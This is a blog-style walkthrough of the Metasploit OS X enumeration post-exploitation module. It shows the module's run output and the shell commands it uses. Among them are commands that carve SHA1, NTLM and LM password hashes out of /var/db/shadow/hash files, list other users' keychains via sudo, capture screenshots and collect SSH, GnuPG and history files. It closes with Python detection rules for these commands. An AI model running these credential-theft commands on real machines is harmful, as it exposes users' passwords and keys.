Session 1 is running as a regular user on an OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration module alters its behavior depending on the privilege level it sees it has on the target box, and also alters the commands it runs depending on the version of OS X it is running against. To select the module we use the use command, and after selecting it we can have a look at the info of the module and the options it provides:


 msf exploit(handler) > use post/osx/gather/enum_osx 
 msf post(enum_osx) > info
 
       Name: Mac OS X Information Enumeration
     Module: post/osx/gather/enum_osx
    Version: 11816
   Platform: OSX
       Arch: 
       Rank: Normal
 
 Provided by:
  Carlos Perez carlos_perez@darkoperator.com
 
 Description:
  This module does initial gathering of information from OSX Tiger, 
  Leopard and Snow Leopard System
 
 
 msf post(enum_osx) > show options
 
 Module options (post/osx/gather/enum_osx):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

To specify a session to run against we just set the SESSION option in the datastore to the number of the session we want to run against:

 msf post(enum_osx) > set SESSION 1
 SESSION => 1

Once we have a session selected, the only thing left to do is issue the run command:


msf post(enum_osx) > run

[*] Running module against loki.local
[*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303
[*] Enumerating Development Tools
[*] Enumerating Airport
[*] Enumerating Applications
[*] Enumerating Ethernet
[*] Enumerating Bluetooth
[*] Enumerating Logs
[*] Enumerating Known Networks
[*] Enumerating Firewall
[*] Enumerating USB
[*] Enumerating OS
[*] Enumerating Network
[*] Enumerating StartUp
[*] Enumerating Printers
[*] Enumerating Preference Panes
[*] Enumerating Frameworks
[*] Enumerating Environment Variables
[*] Enumerating UDP Connections
[*] Enumerating TCP Connections
[*] Enumerating Current Activity
[*] Enumerating Process List
[*] Enumerating Last Boottime
[*] Enumerating Groups
[*] Enumerating Users
[*] .ssh Folder is present
[*] Downloading config
[*] Downloading id_dsa
[*] Downloading id_dsa.pub
[*] Downloading known_hosts
[*] .gnupg Folder is present
[*] Downloading gpg.conf
[*] Downloading pubring.gpg
[*] Downloading pubring.gpg~
[*] Downloading random_seed
[*] Downloading secring.gpg
[*] Downloading trustdb.gpg
[*] Capturing screenshot
[*] Screenshot Captured
[*] Extracting bash history
[*] History file .bash_history found for cperez
[*] Downloading .bash_history
[*] History file .irb_history found for cperez
[*] Downloading .irb_history
[*] History file .scapy_history found for cperez
[*] Downloading .scapy_history
[*] History file .sh_history found for cperez
[*] Downloading .sh_history
[*] History file .sqlite_history found for cperez
[*] Downloading .sqlite_history
[*] Enumerating and Downloading keychains for cperez
[*] Post module execution completed
msf post(enum_osx) >

As can be seen, the module gathers a lot of data on the target system, starting with configuration, network connections, account information and the list of processes. Once it has all of that, it checks for .ssh and .gnupg configuration folders and downloads all of their files to the attacker's machine. It then takes a screen capture, enumerates any history files found in the user's home folder and downloads those as well. If it is running as root it extracts the SHA1 hashes for the users on the box, and if the box is sharing a Samba share or talks to AD it also extracts the NTLM and LM hashes, creating a separate file in John the Ripper format for each hash type.

Most of the configuration data is gathered using the system_profiler command. It works by specifying a data type that corresponds to the configuration area we want information on; to list the supported data types we run the command with -listDataTypes:


 loki:~ cperez$ system_profiler -listDataTypes
 Available Datatypes:
 SPHardwareDataType
 SPNetworkDataType
 SPSoftwareDataType
 SPParallelATADataType
 SPAudioDataType
 SPBluetoothDataType
 SPCardReaderDataType
 SPDiagnosticsDataType
 SPDiscBurningDataType
 SPEthernetDataType
 SPFibreChannelDataType
 SPFireWireDataType
 SPDisplaysDataType
 SPHardwareRAIDDataType
 SPMemoryDataType
 SPPCIDataType
 SPParallelSCSIDataType
 SPPowerDataType
 SPPrintersDataType
 SPSASDataType
 SPSerialATADataType
 SPUSBDataType
 SPAirPortDataType
 SPFirewallDataType
 SPNetworkLocationDataType
 SPModemDataType
 SPNetworkVolumeDataType
 SPWWANDataType
 SPApplicationsDataType
 SPDeveloperToolsDataType
 SPExtensionsDataType
 SPFontsDataType
 SPFrameworksDataType
 SPLogsDataType
 SPManagedClientDataType
 SPPrefPaneDataType
 SPStartupItemDataType
 SPSyncServicesDataType
 SPUniversalAccessDataType

For connections, the netstat command is used:


# netstat -np tcp

# netstat -np udp

To get environment variables we use:


# printenv

For boot time and current activity, the who command:


# who -b
# who

For processes:

# ps -ea

Enumerating users and groups varies with the version of the OS. For Leopard and above:

# dscacheutil -q user
# dscacheutil -q group

For Tiger and below:

# lookupd -q user
# lookupd -q group

For the screenshot, the following command is used:

As Root:


# launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg

As User:

$ screencapture -x screenshot.jpg

For history files, the following regex is used to match the most common history file names:


\.\w*\_history

This matches any hidden file whose name ends in _history (.bash_history, .irb_history and so on).
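As an added example (not code from the original post or from the module), here is the pattern above applied in Python to a constructed home-directory listing; the listing and the helper names are assumptions. It also shows an anchored variant, because the pattern as quoted is unanchored, so a name such as .bash_history.bak is matched too, while a history file that lacks the underscore (.lesshst, .history) is not.

```python
import re

# The pattern exactly as quoted in the post (the \_ escape is just a literal
# underscore, so this is equivalent to \.\w*_history).
HISTORY_RE = re.compile(r"\.\w*\_history")

# Anchored variant: the whole name must be a dotfile ending in _history.
HISTORY_RE_ANCHORED = re.compile(r"^\.\w*_history$")

# Constructed home-directory listing (not taken from a real host).
SAMPLE_HOME_LISTING = [
    ".bash_history", ".irb_history", ".scapy_history", ".sh_history",
    ".sqlite_history", ".mysql_history", ".zsh_history",
    ".lesshst",            # a history file whose name does not end in _history
    ".history",            # no underscore, so the pattern does not match
    ".bash_history.bak",   # found by the unanchored search, not by the anchored one
    "history_notes.txt",   # not a dotfile
    ".ssh",
]


def matching_history_files(names, pattern=HISTORY_RE):
    """Names in which the pattern is found anywhere (re.search, as unanchored)."""
    return [n for n in names if pattern.search(n)]


def anchored_history_files(names):
    """Names that are exactly a dotfile ending in _history."""
    return [n for n in names if HISTORY_RE_ANCHORED.match(n)]


if __name__ == "__main__":
    print("unanchored:", matching_history_files(SAMPLE_HOME_LISTING))
    print("anchored:  ", anchored_history_files(SAMPLE_HOME_LISTING))
```

An incident responder can use the same pattern to locate shell and REPL history files on a compromised host; they are often the quickest record of what an intruder typed.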

To dump hashes the module must run as root. OS X does not store credentials in a passwd or master.passwd file; much like HP-UX Trusted Mode, it keeps them in individual files per account. The first thing we need is the GUID of the account, and to get it we run:

Leopard and Above:


# dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-

Tiger:

# niutil -readprop . /users/{user} generateduid

With the GUID we can carve the hashes out of that file; the module carves out the SHA1, LM and NTLM hashes:

• SHA1:


# /bin/cat /var/db/shadow/hash/{guid} | cut -c169-216

• NTLM:

# /bin/cat /var/db/shadow/hash/{guid} | cut -c1-32

• LM:

# /bin/cat /var/db/shadow/hash/{guid} | cut -c33-64

The last thing the module does is enumerate all keychain files for the users and download them:

• As User:


$ security list-keychains

• As Root:

# sudo -u {username} -i /usr/bin/security list-keychains
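The commands listed above are also what a defender can key on. The following is an added example, not part of the original post or of the Metasploit module: a small Python triage pass over constructed process-execution events (the key=value line format, the host names, uids and the GUID are all made up for the example) that weights the privileged, high-signal commands shown in this post (reading /var/db/shadow/hash, sudo -u ... security list-keychains, launchctl bsexec ... screencapture, and the GeneratedUID lookups) more heavily than routine commands such as netstat or system_profiler, which any administrator runs.

```python
import re
from collections import defaultdict

# Constructed process-execution events in a made-up key=value format
# (not a real macOS log). Host names, uids and the GUID are placeholders.
SAMPLE_EVENTS = """\
ts=2011-02-24T03:03:01 host=loki uid=501 cmd="system_profiler SPSoftwareDataType"
ts=2011-02-24T03:03:02 host=loki uid=501 cmd="netstat -np tcp"
ts=2011-02-24T03:03:03 host=loki uid=501 cmd="cat /Users/cperez/.bash_history"
ts=2011-02-24T03:03:04 host=loki uid=0 cmd="launchctl bsexec 112 screencapture -x screenshot.jpg"
ts=2011-02-24T03:03:05 host=loki uid=0 cmd="dscl localhost -read /Search/Users/cperez"
ts=2011-02-24T03:03:06 host=loki uid=0 cmd="/bin/cat /var/db/shadow/hash/00000000-0000-0000-0000-000000000000"
ts=2011-02-24T03:03:07 host=loki uid=0 cmd="sudo -u cperez -i /usr/bin/security list-keychains"
ts=2011-02-24T03:03:08 host=loki uid=501 cmd="ls -la /Users/cperez/.ssh"
ts=2011-02-24T03:10:00 host=thor uid=502 cmd="security list-keychains"
ts=2011-02-24T03:10:01 host=thor uid=502 cmd="screencapture -x ~/Desktop/shot.jpg"
ts=2011-02-24T03:12:00 host=odin uid=503 cmd="ls -la /Users/bob/.ssh"
"""

# Detection rules keyed on the command lines the post shows the module running.
# Each entry: (rule name, compiled regex over the command line, weight).
# The weights are the example's own choice, not anything from the post.
RULES = [
    ("shadow_hash_read", re.compile(r"/var/db/shadow/hash/"), 5),
    ("keychain_list_as_other_user",
     re.compile(r"\bsudo\s+-u\s+\S+\s+.*\bsecurity\s+list-keychains\b"), 5),
    ("screencapture_via_bsexec",
     re.compile(r"\blaunchctl\s+bsexec\s+\d+\s+screencapture\b"), 3),
    ("user_guid_lookup",
     re.compile(r"\bdscl\b.*\s-read\s+/Search/Users/|\bniutil\s+-readprop\b"), 2),
    ("dotfile_credential_access", re.compile(r"/\.(ssh|gnupg)\b"), 1),
]

EVENT_RE = re.compile(r'ts=(\S+)\s+host=(\S+)\s+uid=(\d+)\s+cmd="([^"]*)"')


def parse_events(text):
    """Parse the constructed event lines into dicts; skip lines that do not fit."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if not m:
            continue
        ts, host, uid, cmd = m.groups()
        events.append({"ts": ts, "host": host, "uid": int(uid), "cmd": cmd})
    return events


def match_rules(event):
    """Return the (rule name, weight) pairs whose regex hits this command line."""
    return [(name, weight) for name, rx, weight in RULES if rx.search(event["cmd"])]


def triage(text, threshold=6):
    """Score each host; a host is suspicious if its score reaches the threshold
    or if three or more distinct rules fired (a chain of enumeration steps)."""
    report = defaultdict(lambda: {"score": 0, "rules": set(), "hits": []})
    for ev in parse_events(text):
        for name, weight in match_rules(ev):
            entry = report[ev["host"]]
            entry["score"] += weight
            entry["rules"].add(name)
            entry["hits"].append((ev["ts"], name, ev["cmd"]))
    for entry in report.values():
        entry["suspicious"] = entry["score"] >= threshold or len(entry["rules"]) >= 3
    return dict(report)


if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        flag = "SUSPICIOUS" if entry["suspicious"] else "low"
        print(f"{host}: score={entry['score']} rules={sorted(entry['rules'])} [{flag}]")
        for ts, name, cmd in entry["hits"]:
            print(f"    {ts} {name}: {cmd}")
```

Note what the rules deliberately ignore: a user listing their own keychains or taking their own screenshot (the thor events) produces no hit, and a single look at a .ssh directory (odin) scores too low to flag; it is the root-level combination of shadow-hash reads, cross-user keychain listing and screen capture through the loginwindow session that is hard to explain on a normal workstation.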

I fully expect there will be more from an OS X exploitation perspective over the next few months and years. It is comforting to know that Carlos is already ahead of the curve when it comes to post exploitation on this fine platform.

Brought to you by: Darkoperator and strandjs

Originally discussed during episode 231